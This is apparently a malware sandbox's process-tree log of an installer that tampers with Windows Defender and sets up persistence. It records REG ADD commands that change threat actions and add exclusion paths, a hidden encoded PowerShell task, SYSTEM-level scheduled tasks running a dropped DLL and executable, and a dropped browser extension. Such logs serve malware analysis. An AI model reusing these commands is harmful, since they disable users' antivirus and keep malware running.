- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 8284⤵
- Program crash
PID:676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS3921.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS3921.tmp\Install.exe 2Z /TFDdiddSw 385137 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3092
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1732
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:323⤵PID:4468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:324⤵PID:4296
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:643⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:323⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:643⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:323⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:643⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:323⤵PID:3136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:643⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:323⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:643⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:643⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:323⤵PID:3948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:643⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:323⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:643⤵PID:1960
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gccLmVdeq" /SC once /ST 00:19:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:2708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gccLmVdeq"2⤵PID:2856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gccLmVdeq"2⤵PID:4884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 04:20:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\IDnhbKQ.exe\" WB /dhMPdidNV 385137 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KdMGsZYUagVlNoZLt"2⤵PID:2284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 9242⤵
- Program crash
PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1312
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2120
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2160
-
C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\IDnhbKQ.exeC:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\IDnhbKQ.exe WB /dhMPdidNV 385137 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:388 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsqNJSiTyoMLfdbIdy"2⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2448
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\namDtuGKU\MGaBVq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jRbEfcGJuWiRduS" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRbEfcGJuWiRduS2" /F /xml "C:\Program Files (x86)\namDtuGKU\IuNZrmv.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jRbEfcGJuWiRduS"2⤵PID:2372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRbEfcGJuWiRduS"2⤵PID:4476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uzHildQRZSydMh" /F /xml "C:\Program Files (x86)\wEnnazEvJNiU2\EJWRdkl.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NvQssOSfNTtis2" /F /xml "C:\ProgramData\BRUhuLZnBvQZvqVB\ngAPOxX.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HALKbVmngXfRdKBpU2" /F /xml "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\seaSFKg.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2692
-
-
